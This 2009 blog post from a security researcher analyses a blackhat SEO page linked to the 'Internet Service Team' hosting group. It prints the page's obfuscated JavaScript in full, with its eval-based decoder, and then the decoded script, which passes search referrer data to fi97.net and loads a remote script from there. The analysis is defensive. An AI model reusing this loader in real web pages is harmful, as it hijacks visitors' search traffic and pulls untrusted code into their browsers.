Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday 5 May 2009

IST (Internet Service Team - *.internetserviceteam.com) in blackhat SEO campaign - again

So much has been documented on the IST over the years, that mentioning them now, just doesn't give the same sense of "wow" as it used to - we're so used to the crap they get up to now, that it just doesn't surprise us anymore.

The latest I've come across is certainly nothing new, Blackhat SEO has been going on for years, but is interesting in that the domain it points to (fi97.net) - doesn't actually seem to resolve (kinda defeats the object there guys). OpenDNS, even after refreshing the cache, is showing 3 servers returning "Did not resolve" and the other 3 returning a "SERVFAIL" error.

There's no denying that the IST are involved in this, as the IP PTR kinda gives it away. However, I do find their code a little interesting (though not as interesting as those that use obfuscation, as it takes the challenge away).

Loading the site listed in Google, in vURL shows;

*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://test-file-and-windows-defender.ff7test5.us/
Server IP: 78.159.122.252 [ 78.159.122.252.internetserviceteam.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 06 May 2009
Time: 03:01:21:01
*****************************************************************

<script language="Javascript" type="text/javascript">var ddxform=[];ddxform[0] = "http://go.live.com/item?colThkJGmjBdvXcrLlFjKNONQjkNkSEGzNLipNOSuGpNrjmnqXwkLrJNaSzGpNcpKWuNJSTGTNmlbX";ddxform[1] = "http://go.live.com/item?UTLkAVLabYLhrkzNzSEGuNVjclJNfSuGfNVlmmhkwbBglZkNaSTGkNcpkNkSJGfNbTmlPRcjaNlPAhBoUTVkuG";ddxform[2] = "http://go.live.com/item?LkFXvYTGAjEGbWchlVrnrflXmgBmkUwkKXUYFXQkmkvXQklhJGwoKTGkuGmjGngXQkcraGvjJGfNzNUhuGQogTLkpGwilThkwmQlTG";ddxform[3] = "http://go.live.com/item?qjOGQggXmpEGKnLkQkvTQrJOuPUhkGmigTLkmmGlzGvjuGVkPXFYaUmlBiceQbVmOOJNblfNpPPhOGhblY";ddxform[4] = "http://go.live.com/item?TGJOLigTVkVmQlfUBevXBgbZwmwaFkzXEPkGBtzGfGuGkGmoFTBkaGvWKTmmlTLlaGbjOGVgUXLpfGAnmkLkATGrkO";ddxform[5] = "http://go.live.com/item?fPPhuGJGuGFWlTGmPTQlkGPjpGcigTBkQmhlFNEXgPzUwlriheGbcmJOkNpMTNuP";ddxform[6] = "http://go.live.com/item?vhkGEGaGvYrhQkkGEOLoATGkOGhbvjaWPhhbgivWATwmATmlzUmevXQglZVmca";ddxform[7] = "http://go.live.com/item?ghLbJRzRaPzGQtEGpGuGpGkGEGOGmovTckpGPWATQmvTJGvjJGmgqXVpkGvnGkrkgTrrTOfPPhJGOGkGfGkG";ddxform[8] = "http://go.live.com/item?OGfGFWlThmbTaGKjOGAWATrmlTQlFNhbbPaULlwihecbrmpOTNgjkNkPqhuGEGfGzGkGpGEGqY";ddxform[9] = "http://go.live.com/item?whmkTGTOBogTLkfGrcKjkWghkGrcliBjLdgXGrVlpUceqXcggZVmraAhEGGcaRaROPTGaGpGfGJG";ddxform[10] = "http://go.live.com/item?zGzGJGEGJGhbPYpGOObWbTQmvTbNkWvPfGgjKjJGQjrdKXVrmlKNVcFPOPJjhtwjrnUXhkcrfGUjuGbW";ddxform[11] = "http://go.live.com/item?vTQmvTANaXPPKhkGAUwkbXUThdUhhvPhTGJGJGEGTGkGTGVbqYaG";ddxform[12] = "http://go.live.com/item?pOwjcnqXVkQrJGuHUjEGfNfNkPzGlUhkKXlTrdAhfGfGpGJGcvAhGv";ddxform[13] = "http://go.live.com/item?UhGjhnlXhkhrzGbjaGrnwgbXVlAVlThigXuOrjQnFXGkwrJPPhOGwj";ddxform[14] = "http://go.live.com/item?wngXVkrrOGbjEGUXmlgVbTriAXuOrjwnbXBkGrkPUhaGaGEGLoATrkzGvWPjwgPXcppGlqPTwmPXPhEGaGOGaGBkmsrsbjqWTU";ddxform[15] = "http://go.live.com/item?AZUXLmFGBbwflXTOTPFhOGpGuGOGKWLhKVhnBfAXQgBmpUQphkGbhmgXTOaIPiBlUVBkkIzRTIwbBiQmaGrlhk";ddxform[16] = "http://go.live.com/item?lVPjpNVacmQmwiPguVOVFYBbvfKdEUwgPXwmTVQcclhkuUViBaViKlGnmbUWljAWQbBkuMPZwkVhGnQi";ddxform[17] = "http://go.live.com/item?qjvZlZcefMGdUXGrBpLhGkKWljzMrhhdrpUjpMmjmnPXhkQrqjTIkRrjGngXckVrzRpIaMGkUXbYlXBkKXVkljaIuR";ddxform[18] = "http://go.live.com/item?gXQlAVATciKXuOlWBhKVmnQfbXVgVmfUQkvXvYUXhkwkUXwkTPJRpIkMLaQkKXPYFjkIpRKXclKVUTGi";ddxform[19] = "http://go.live.com/item?lXuOGehhqVPTcmQbrhVgaULaVkAXKYEPTRTIuMLkKjpIuRckLshsaRuIfNKkbiuIfRJIzVBlAVGkuIOR";ddxform[20] = "http://go.live.com/item?uIGbBiVmqkkITPqh";var pukne='';for (var i=0;i<ddxform.length;i++){var elmpr=ddxform[i];pukne=pukne+elmpr.substr(elmpr.indexOf('?')+1);}var bkuve='';for (var erden=0;erden<pukne.length;erden+=2){var kuhnr=pukne.charCodeAt(erden)-97;if(kuhnr<0)kuhnr+=58;kuhnr=kuhnr%5;var ircmu=pukne.charCodeAt(erden+1)-97;if(ircmu<0)ircmu+=58;var zbokp=kuhnr*52+ircmu;bkuve+=String.fromCharCode(zbokp);};eval(bkuve);</script>


http://vurl.mysteryfcm.co.uk/?url=602924

This decodes to;

var qkeys=['q', 'p', 'query', 'wd', 'searchfor', 'qs', 'string', 'w', 'as_q'];var ref = document.referrer; var query = ''; var parts = new Array(); parts = ref.split('?'); if (parts.length>1) { var datas = new Array(); datas = parts[1].split('&'); for (var i=0;i<datas.length;i++) { var data = new Array(); data = datas[i].split('='); for (var j=0; j<qkeys.length; j++) if (data[0] == qkeys[j]) {query = data[1]; break;}; if (query != '') break; };};query = unescape(query); query = escape(query); var d=new Date; rzz=d.getTime(); document.write("<scr"+"ipt src='http://fi97.net/jsr.php?uid=dir&group=ggl&keyword=&okw=&query="+query+"&referer="+escape(document.referrer)+"&href="+escape(location.href)+"&r="+rzz+"'><"+"/scr"+"ipt>");


At this point, I'm a little unsure as to the point of the go.live.com URL's being there, as they don't actually seem to lead to anything (meant to lead to spamvertised live.com profiles perhaps?, who knows - just leads me to http://home.live.com/?showunauth=1 at the moment, irrespective of whether I'm signed in to live.com or not).

One other site seems to be on the same IP as this, kitehotel.net, but that's failing to resolve too for some reason. It could be a problem with the NS, or it could be a problem at OpenDNS's end (unlikely since other DNS servers I've checked are showing the same thing), it is at this point, irrelevant.

/edit 04:41 06-05-2009

Added vURL Online results.

No comments: